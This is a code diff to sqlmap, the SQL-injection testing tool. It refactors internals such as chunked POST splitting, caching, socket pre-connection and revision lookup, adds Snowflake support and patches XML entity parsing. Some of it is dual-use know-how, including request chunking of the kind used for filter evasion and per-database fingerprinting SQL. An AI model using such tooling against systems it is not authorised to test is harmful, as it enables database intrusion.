@@ -5575,7 +5591,7 @@ def chunkSplitPostData(data):
     """
 
     length = len(data)
-    retVal = ""
+    retVal = []
     index = 0
 
     while index < length:
@@ -5595,12 +5611,14 @@ def chunkSplitPostData(data):
                 break
 
         index += chunkSize
-        retVal += "%x;%s\r\n" % (chunkSize, salt)
-        retVal += "%s\r\n" % candidate
 
-    retVal += "0\r\n\r\n"
+        # Append to list instead of recreating the string
+        retVal.append("%x;%s\r\n" % (chunkSize, salt))
+        retVal.append("%s\r\n" % candidate)
 
-    return retVal
+    retVal.append("0\r\n\r\n")
+
+    return "".join(retVal)
 
 def checkSums():
     """
@@ -5621,6 +5639,8 @@ def checkSums():
                     continue
                 with open(filepath, "rb") as f:
                     content = f.read()
+                    if b'\0' not in content:
+                        content = content.replace(b"\r\n", b"\n")
                 if not hashlib.sha256(content).hexdigest() == expected:
                     retVal &= False
                     break

lib/core/convert.py

@@ -295,7 +295,11 @@ def getBytes(value, encoding=None, errors="strict", unsafe=True):
     except (LookupError, TypeError):
         encoding = UNICODE_ENCODING
 
-    if isinstance(value, six.text_type):
+    if isinstance(value, bytearray):
+        return bytes(value)
+    elif isinstance(value, memoryview):
+        return value.tobytes()
+    elif isinstance(value, six.text_type):
         if INVALID_UNICODE_PRIVATE_AREA:
             if unsafe:
                 for char in xrange(0xF0000, 0xF00FF + 1):

lib/core/datatype.py

@@ -20,32 +20,31 @@ class AttribDict(dict):
     >>> foo.bar = 1
     >>> foo.bar
     1
+    >>> import copy; copy.deepcopy(foo).bar
+    1
     """
 
     def __init__(self, indict=None, attribute=None, keycheck=True):
         if indict is None:
             indict = {}
 
-        # Set any attributes here - before initialisation
-        # these remain as normal attributes
-        self.attribute = attribute
-        self.keycheck = keycheck
         dict.__init__(self, indict)
-        self.__initialised = True
+        self.__dict__["_attribute"] = attribute
-
+        self.__dict__["_keycheck"] = keycheck
-        # After initialisation, setting attributes
+        self.__dict__["_initialized"] = True
-        # is the same as setting an item
 
     def __getattr__(self, item):
         """
         Maps values to attributes
         Only called if there *is NOT* an attribute with this name
         """
+        if item.startswith('__') and item.endswith('__'):
+             raise AttributeError(item)
 
         try:
             return self.__getitem__(item)
         except KeyError:
-            if self.keycheck:
+            if self.__dict__.get("_keycheck"):
                 raise AttributeError("unable to access item '%s'" % item)
             else:
                 return None
@@ -58,7 +57,7 @@ class AttribDict(dict):
         try:
             return self.pop(item)
         except KeyError:
-            if self.keycheck:
+            if self.__dict__.get("_keycheck"):
                 raise AttributeError("unable to access item '%s'" % item)
             else:
                 return None
@@ -69,14 +68,8 @@ class AttribDict(dict):
         Only if we are initialised
         """
 
-        # This test allows attributes to be set in the __init__ method
+        if "_initialized" not in self.__dict__ or item in self.__dict__:
-        if "_AttribDict__initialised" not in self.__dict__:
+            self.__dict__[item] = value
-            return dict.__setattr__(self, item, value)
-
-        # Any normal attributes are handled normally
-        elif item in self.__dict__:
-            dict.__setattr__(self, item, value)
-
         else:
             self.__setitem__(item, value)
 
@@ -87,14 +80,12 @@ class AttribDict(dict):
         self.__dict__ = dict
 
     def __deepcopy__(self, memo):
-        retVal = self.__class__(keycheck=self.keycheck)
+        retVal = self.__class__(keycheck=self.__dict__.get("_keycheck"))
         memo[id(self)] = retVal
 
-        for attr in dir(self):
+        for attr, value in self.__dict__.items():
-            if not attr.startswith('_'):
+            if attr not in ('_attribute', '_keycheck', '_initialized'):
-                value = getattr(self, attr)
+                setattr(retVal, attr, copy.deepcopy(value, memo))
-                if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
-                    setattr(retVal, attr, copy.deepcopy(value, memo))
 
         for key, value in self.items():
             retVal.__setitem__(key, copy.deepcopy(value, memo))
@@ -170,7 +161,7 @@ class LRUDict(object):
             except KeyError:
                 if len(self.cache) >= self.capacity:
                     self.cache.popitem(last=False)
-        self.cache[key] = value
+            self.cache[key] = value
 
     def set(self, key, value):
         self.__setitem__(key, value)

lib/core/decorators.py

@@ -6,13 +6,10 @@ See the file 'LICENSE' for copying permission
 """
 
 import functools
-import hashlib
-import struct
 import threading
 
 from lib.core.datatype import LRUDict
 from lib.core.settings import MAX_CACHE_ITEMS
-from lib.core.settings import UNICODE_ENCODING
 from lib.core.threads import getCurrentThreadData
 
 _cache = {}
@@ -40,31 +37,37 @@ def cachedmethod(f):
     _cache[f] = LRUDict(capacity=MAX_CACHE_ITEMS)
     _method_locks[f] = threading.RLock()
 
+    def _freeze(val):
+        if isinstance(val, (list, set, tuple)):
+            return tuple(_freeze(x) for x in val)
+        if isinstance(val, dict):
+            return tuple(sorted((k, _freeze(v)) for k, v in val.items()))
+        return val
+
     @functools.wraps(f)
     def _f(*args, **kwargs):
-        try:
-            # NOTE: fast-path
-            if kwargs:
-                key = hash((f, args, tuple(map(type, args)), frozenset(kwargs.items()))) & 0x7fffffffffffffff
-            else:
-                key = hash((f, args, tuple(map(type, args)))) & 0x7fffffffffffffff
-        except TypeError:
-            # NOTE: failback slow-path
-            parts = (
-                f.__module__ + "." + f.__name__,
-                "^".join(repr(a) for a in args),
-                "^".join("%s=%r" % (k, kwargs[k]) for k in sorted(kwargs))
-            )
-            try:
-                key = struct.unpack("<Q", hashlib.md5("`".join(parts).encode(UNICODE_ENCODING)).digest()[:8])[0] & 0x7fffffffffffffff
-            except (struct.error, ValueError):
-                return f(*args, **kwargs)
-
         lock, cache = _method_locks[f], _cache[f]
 
-        with lock:
+        try:
-            if key in cache:
+            if kwargs:
-                return cache[key]
+                key = (args, frozenset(kwargs.items()))
+            else:
+                key = args
+
+            with lock:
+                if key in cache:
+                    return cache[key]
+
+        except TypeError:
+            # Note: fallback (slowpath(
+            if kwargs:
+                key = (_freeze(args), _freeze(kwargs))
+            else:
+                key = _freeze(args)
+
+            with lock:
+                if key in cache:
+                    return cache[key]
 
         result = f(*args, **kwargs)
 
@@ -96,13 +99,24 @@ def stackedmethod(f):
             result = f(*args, **kwargs)
         finally:
             if len(threadData.valueStack) > originalLevel:
-                threadData.valueStack = threadData.valueStack[:originalLevel]
+                del threadData.valueStack[originalLevel:]
 
         return result
 
     return _
 
 def lockedmethod(f):
+    """
+    Decorates a function or method with a reentrant lock (only one thread can execute the function at a time)
+
+    >>> @lockedmethod
+    ... def recursive_count(n):
+    ...     if n <= 0: return 0
+    ...     return n + recursive_count(n - 1)
+    >>> recursive_count(5)
+    15
+    """
+
     lock = threading.RLock()
 
     @functools.wraps(f)

lib/core/dicts.py

@@ -39,6 +39,7 @@ from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import VERTICA_ALIASES
 from lib.core.settings import VIRTUOSO_ALIASES
 from lib.core.settings import CLICKHOUSE_ALIASES
+from lib.core.settings import SNOWFLAKE_ALIASES
 
 FIREBIRD_TYPES = {
     261: "BLOB",
@@ -228,7 +229,7 @@ DBMS_DICT = {
     DBMS.ORACLE: (ORACLE_ALIASES, "python-oracledb", "https://oracle.github.io/python-oracledb/", "oracle"),
     DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "https://docs.python.org/3/library/sqlite3.html", "sqlite"),
     DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"),
-    DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
+    DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "https://kinterbasdb.sourceforge.net/", "firebird"),
     DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
     DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"),
     DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
@@ -250,6 +251,7 @@ DBMS_DICT = {
     DBMS.FRONTBASE: (FRONTBASE_ALIASES, None, None, None),
     DBMS.RAIMA: (RAIMA_ALIASES, None, None, None),
     DBMS.VIRTUOSO: (VIRTUOSO_ALIASES, None, None, None),
+    DBMS.SNOWFLAKE: (SNOWFLAKE_ALIASES, None, None, "snowflake"),
 }
 
 # Reference: https://blog.jooq.org/tag/sysibm-sysdummy1/
@@ -257,7 +259,7 @@ FROM_DUMMY_TABLE = {
     DBMS.ORACLE: " FROM DUAL",
     DBMS.ACCESS: " FROM MSysAccessObjects",
     DBMS.FIREBIRD: " FROM RDB$DATABASE",
-    DBMS.MAXDB: " FROM VERSIONS",
+    DBMS.MAXDB: " FROM DUAL",
     DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
     DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS",
     DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL",
@@ -288,7 +290,8 @@ HEURISTIC_NULL_EVAL = {
     DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))",
     DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL)",
     DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)",
-    DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL",
+    DBMS.CLICKHOUSE: "halfMD5(NULL)",
+    DBMS.SNOWFLAKE: "BOOLNOT(NULL)",
 }
 
 SQL_STATEMENTS = {

lib/core/dump.py

@@ -110,7 +110,7 @@ class Dump(object):
 
         self._outputFile = os.path.join(conf.outputPath, "log")
         try:
-            self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
+            self._outputFP = openFile(self._outputFile, 'a' if not conf.flushSession else 'w')
         except IOError as ex:
             errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex)
             raise SqlmapGenericException(errMsg)
@@ -175,7 +175,7 @@ class Dump(object):
         self.string("current user", data, content_type=CONTENT_TYPE.CURRENT_USER)
 
     def currentDb(self, data):
-        if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):
+        if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE):
             self.string("current database (equivalent to schema on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
         elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.DB2, DBMS.MIMERSQL, DBMS.MAXDB, DBMS.VIRTUOSO):
             self.string("current database (equivalent to owner on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
@@ -453,7 +453,7 @@ class Dump(object):
             dumpFileName = conf.dumpFile or os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())))
             if not checkFile(dumpFileName, False):
                 try:
-                    openFile(dumpFileName, "w+b").close()
+                    openFile(dumpFileName, "w+").close()
                 except SqlmapSystemException:
                     raise
                 except:
@@ -481,7 +481,7 @@ class Dump(object):
                         else:
                             count += 1
 
-            dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE)
+            dumpFP = openFile(dumpFileName, 'w' if not appendToFile else 'a', buffering=DUMP_FILE_BUFFER_SIZE)
 
         count = int(tableValues["__infos__"]["count"])
         if count > TRIM_STDOUT_DUMP_SIZE:

lib/core/enums.py

@@ -60,6 +60,7 @@ class DBMS(object):
     FRONTBASE = "FrontBase"
     RAIMA = "Raima Database Manager"
     VIRTUOSO = "Virtuoso"
+    SNOWFLAKE = "Snowflake"
 
 class DBMS_DIRECTORY_NAME(object):
     ACCESS = "access"
@@ -90,6 +91,7 @@ class DBMS_DIRECTORY_NAME(object):
     FRONTBASE = "frontbase"
     RAIMA = "raima"
     VIRTUOSO = "virtuoso"
+    SNOWFLAKE = "snowflake"
 
 class FORK(object):
     MARIADB = "MariaDB"

lib/core/option.py

@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
 from __future__ import division
 
 import codecs
+import collections
 import functools
 import glob
 import inspect
@@ -753,7 +754,7 @@ def _listTamperingFunctions():
         logger.info(infoMsg)
 
         for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))):
-            content = openFile(script, "rb").read()
+            content = openFile(script, 'r').read()
             match = re.search(r'(?s)__priority__.+"""(.+)"""', content)
             if match:
                 comment = match.group(1).strip()
@@ -1015,8 +1016,8 @@ def _setPostprocessFunctions():
                     handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.PREPROCESS, suffix=".py")
                     os.close(handle)
 
-                    openFile(filename, "w+b").write("#!/usr/bin/env\n\ndef postprocess(page, headers=None, code=None):\n    return page, headers, code\n")
+                    openFile(filename, "w+").write("#!/usr/bin/env\n\ndef postprocess(page, headers=None, code=None):\n    return page, headers, code\n")
-                    openFile(os.path.join(os.path.dirname(filename), "__init__.py"), "w+b").write("pass")
+                    openFile(os.path.join(os.path.dirname(filename), "__init__.py"), "w+").write("pass")
 
                     errMsg = "function 'postprocess(page, headers=None, code=None)' "
                     errMsg += "in postprocess script '%s' " % script
@@ -1034,12 +1035,13 @@ def _setDNSCache():
     """
 
     def _getaddrinfo(*args, **kwargs):
-        if args in kb.cache.addrinfo:
+        key = (args, frozenset(kwargs.items()))
-            return kb.cache.addrinfo[args]
 
-        else:
+        if key in kb.cache.addrinfo:
-            kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs)
+            return kb.cache.addrinfo[key]
-            return kb.cache.addrinfo[args]
+
+        kb.cache.addrinfo[key] = socket._getaddrinfo(*args, **kwargs)
+        return kb.cache.addrinfo[key]
 
     if not hasattr(socket, "_getaddrinfo"):
         socket._getaddrinfo = socket.getaddrinfo
@@ -1055,41 +1057,73 @@ def _setSocketPreConnect():
 
     def _thread():
         while kb.get("threadContinue") and not conf.get("disablePrecon"):
+            done = False
             try:
-                for key in socket._ready:
+                with kb.locks.socket:
-                    if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE:
+                    keys = list(socket._ready.keys())
-                        s = socket.create_connection(*key[0], **dict(key[1]))
+
-                        with kb.locks.socket:
+                for key in keys:
-                            socket._ready[key].append((s, time.time()))
+                    with kb.locks.socket:
+                        q = socket._ready.get(key)
+                        if q is None or len(q) >= SOCKET_PRE_CONNECT_QUEUE_SIZE:
+                            continue
+                        args = key[0]
+                        kwargs = dict(key[1])
+
+                    s = socket._create_connection(*args, **kwargs)
+
+                    with kb.locks.socket:
+                        q = socket._ready.get(key)
+                        if q is not None and len(q) < SOCKET_PRE_CONNECT_QUEUE_SIZE:
+                            q.append((s, time.time()))
+                            s = None
+                            done = True
+
+                    if s is not None:
+                        try:
+                            s.close()
+                        except:
+                            pass
+
             except KeyboardInterrupt:
                 break
             except:
                 pass
             finally:
-                time.sleep(0.01)
+                time.sleep(0.01 if not done else 0.001)
 
     def create_connection(*args, **kwargs):
         retVal = None
+        stale = []
 
         key = (tuple(args), frozenset(kwargs.items()))
         with kb.locks.socket:
             if key not in socket._ready:
-                socket._ready[key] = []
+                socket._ready[key] = collections.deque()
 
-            while len(socket._ready[key]) > 0:
+            q = socket._ready[key]
-                candidate, created = socket._ready[key].pop(0)
+            while len(q) > 0:
+                candidate, created = q.popleft()
                 if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT:
                     retVal = candidate
                     break
                 else:
-                    try:
+                    stale.append(candidate)
-                        candidate.shutdown(socket.SHUT_RDWR)
+
-                        candidate.close()
+        for candidate in stale:
-                    except socket.error:
+            try:
-                        pass
+                candidate.shutdown(socket.SHUT_RDWR)
+                candidate.close()
+            except:
+                pass
 
         if not retVal:
             retVal = socket._create_connection(*args, **kwargs)
+        else:
+            try:
+                retVal.settimeout(kwargs.get("timeout", socket.getdefaulttimeout()))
+            except:
+                pass
 
         return retVal
 
@@ -1593,7 +1627,7 @@ def _createHomeDirectories():
                 os.makedirs(directory)
 
             _ = os.path.join(directory, randomStr())
-            open(_, "w+b").close()
+            open(_, "w+").close()
             os.remove(_)
 
             if conf.get("outputDir") and context == "output":
@@ -1623,7 +1657,7 @@ def _createTemporaryDirectory():
 
             _ = os.path.join(conf.tmpDir, randomStr())
 
-            open(_, "w+b").close()
+            open(_, "w+").close()
             os.remove(_)
 
             tempfile.tempdir = conf.tmpDir
@@ -2038,7 +2072,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.cache.addrinfo = {}
     kb.cache.content = LRUDict(capacity=16)
     kb.cache.comparison = {}
-    kb.cache.encoding = {}
+    kb.cache.encoding = LRUDict(capacity=256)
     kb.cache.alphaBoundaries = None
     kb.cache.hashRegex = None
     kb.cache.intBoundaries = None
@@ -2054,6 +2088,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
     kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
 
+    kb.checkWafMode = False
     kb.choices = AttribDict(keycheck=False)
     kb.codePage = None
     kb.commonOutputs = None

lib/core/optiondict.py

@@ -63,6 +63,7 @@ optDict = {
         "safeReqFile": "string",
         "safeFreq": "integer",
         "skipUrlEncode": "boolean",
+        "skipXmlEncode": "boolean",
         "csrfToken": "string",
         "csrfUrl": "string",
         "csrfMethod": "string",

lib/core/patch.py

@@ -101,7 +101,7 @@ def dirtyPatches():
 
     # Reference: https://github.com/sqlmapproject/sqlmap/issues/5929
     try:
-        global collections
+        import collections
         if not hasattr(collections, "MutableSet"):
             import collections.abc
             collections.MutableSet = collections.abc.MutableSet
@@ -139,7 +139,7 @@ def dirtyPatches():
     # Installing "reversible" unicode (decoding) error handler
     def _reversible(ex):
         if INVALID_UNICODE_PRIVATE_AREA:
-            return (u"".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end)
+            return (u"".join(_unichr(int('000f00%02x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end)
         else:
             return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end)
 
@@ -160,6 +160,23 @@ def dirtyPatches():
 
         logging._releaseLock = _releaseLock
 
+    from xml.etree import ElementTree as et
+    if not getattr(et, "_patched", False):
+        _real_parse = et.parse
+
+        def _safe_parse(source, parser=None):
+            if parser is None:
+                parser = et.XMLParser()
+                if hasattr(parser, "parser"):
+                    def reject(*args): raise ValueError("XML entities are forbidden")
+                    parser.parser.EntityDeclHandler = reject
+                    parser.parser.UnparsedEntityDeclHandler = reject
+
+            return _real_parse(source, parser=parser)
+
+        et.parse = _safe_parse
+        et._patched = True
+
 def resolveCrossReferences():
     """
     Place for cross-reference resolution

lib/core/replication.py

@@ -106,10 +106,12 @@ class Replication(object):
             """
             This function is used for selecting row(s) from current table.
             """
-            _ = 'SELECT * FROM %s' % self.name
+            query = 'SELECT * FROM "%s"' % self.name
             if condition:
-                _ += 'WHERE %s' % condition
+                query += ' WHERE %s' % condition
-            return self.execute(_)
+
+            self.execute(query)
+            return self.parent.cursor.fetchall()
 
     def createTable(self, tblname, columns=None, typeless=False):
         """

lib/core/revision.py

@@ -22,43 +22,39 @@ def getRevisionNumber():
 
     retVal = None
     filePath = None
-    _ = os.path.dirname(__file__)
+    directory = os.path.dirname(__file__)
 
     while True:
-        filePath = os.path.join(_, ".git", "HEAD")
+        candidate = os.path.join(directory, ".git", "HEAD")
-        if os.path.exists(filePath):
+        if os.path.exists(candidate):
+            filePath = candidate
             break
-        else:
-            filePath = None
-            if _ == os.path.dirname(_):
-                break
-            else:
-                _ = os.path.dirname(_)
 
-    while True:
+        parent = os.path.dirname(directory)
-        if filePath and os.path.isfile(filePath):
+        if parent == directory:
-            with openFile(filePath, "r") as f:
-                content = getText(f.read())
-                filePath = None
-
-                if content.startswith("ref: "):
-                    try:
-                        filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip()
-                    except UnicodeError:
-                        pass
-
-                if filePath is None:
-                    match = re.match(r"(?i)[0-9a-f]{32}", content)
-                    retVal = match.group(0) if match else None
-                    break
-        else:
             break
+        directory = parent
+
+    if filePath:
+        with openFile(filePath, "r") as f:
+            content = getText(f.read()).strip()
+
+            if content.startswith("ref: "):
+                ref_path = content.replace("ref: ", "").strip()
+                filePath = os.path.join(directory, ".git", ref_path)
+
+                if os.path.exists(filePath):
+                    with openFile(filePath, "r") as f_ref:
+                        content = getText(f_ref.read()).strip()
+
+            match = re.match(r"(?i)[0-9a-f]{40}", content)
+            retVal = match.group(0) if match else None
 
     if not retVal:
         try:
-            process = subprocess.Popen("git rev-parse --verify HEAD", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+            process = subprocess.Popen(["git", "rev-parse", "--verify", "HEAD"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
             stdout, _ = process.communicate()
-            match = re.search(r"(?i)[0-9a-f]{32}", getText(stdout or ""))
+            match = re.search(r"(?i)[0-9a-f]{40}", getText(stdout or ""))
             retVal = match.group(0) if match else None
         except:
             pass

lib/core/settings.py

@@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission
 
 import codecs
 import os
+import platform
 import random
 import re
 import string
@@ -19,7 +20,7 @@ from lib.core.enums import OS
 from thirdparty import six
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.10"
+VERSION = "1.10.2.14"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -61,7 +62,7 @@ LOWER_RATIO_BOUND = 0.02
 UPPER_RATIO_BOUND = 0.98
 
 # For filling in case of dumb push updates
-DUMMY_JUNK = "Aich8ooT"
+DUMMY_JUNK = "theim1Ga"
 
 # Markers for special cases when parameter values contain html encoded characters
 PARAMETER_AMP_MARKER = "__PARAMETER_AMP__"
@@ -121,7 +122,10 @@ PRECONNECT_CANDIDATE_TIMEOUT = 10
 PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP", "BaseHTTP")
 
 # Identify WAF/IPS inside limited number of responses (Note: for optimization purposes)
-IDENTYWAF_PARSE_LIMIT = 10
+IDENTYWAF_PARSE_COUNT_LIMIT = 10
+
+# Identify WAF/IPS inside limited size of responses
+IDENTYWAF_PARSE_PAGE_LIMIT = 4 * 1024
 
 # Maximum sleep time in "Murphy" (testing) mode
 MAX_MURPHY_SLEEP_TIME = 3
@@ -259,6 +263,7 @@ WEBSOCKET_INITIAL_TIMEOUT = 3
 PLATFORM = os.name
 PYVERSION = sys.version.split()[0]
 IS_WIN = PLATFORM == "nt"
+IS_PYPY = platform.python_implementation() == "PyPy"
 
 # Check if running in terminal
 IS_TTY = hasattr(sys.stdout, "fileno") and os.isatty(sys.stdout.fileno())
@@ -292,12 +297,13 @@ EXTREMEDB_SYSTEM_DBS = ("",)
 FRONTBASE_SYSTEM_DBS = ("DEFINITION_SCHEMA", "INFORMATION_SCHEMA")
 RAIMA_SYSTEM_DBS = ("",)
 VIRTUOSO_SYSTEM_DBS = ("",)
+SNOWFLAKE_SYSTEM_DBS = ("INFORMATION_SCHEMA",)
 
 # Note: (<regular>) + (<forks>)
 MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
 MYSQL_ALIASES = ("mysql", "my") + ("mariadb", "maria", "memsql", "tidb", "percona", "drizzle", "doris", "starrocks")
 PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb", "opengauss")
-ORACLE_ALIASES = ("oracle", "orcl", "ora", "or")
+ORACLE_ALIASES = ("oracle", "orcl", "ora", "or", "dm8")
 SQLITE_ALIASES = ("sqlite", "sqlite3")
 ACCESS_ALIASES = ("microsoft access", "msaccess", "access", "jet")
 FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb")
@@ -322,20 +328,21 @@ EXTREMEDB_ALIASES = ("extremedb", "extreme")
 FRONTBASE_ALIASES = ("frontbase",)
 RAIMA_ALIASES = ("raima database manager", "raima", "raimadb", "raimadm", "rdm", "rds", "velocis")
 VIRTUOSO_ALIASES = ("virtuoso", "openlink virtuoso")
+SNOWFLAKE_ALIASES = ("snowflake",)
 
 DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
 
-SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
+SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES + SNOWFLAKE_ALIASES)
 SUPPORTED_OS = ("linux", "windows")
 
-DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES), (DBMS.SNOWFLAKE, SNOWFLAKE_ALIASES))
 
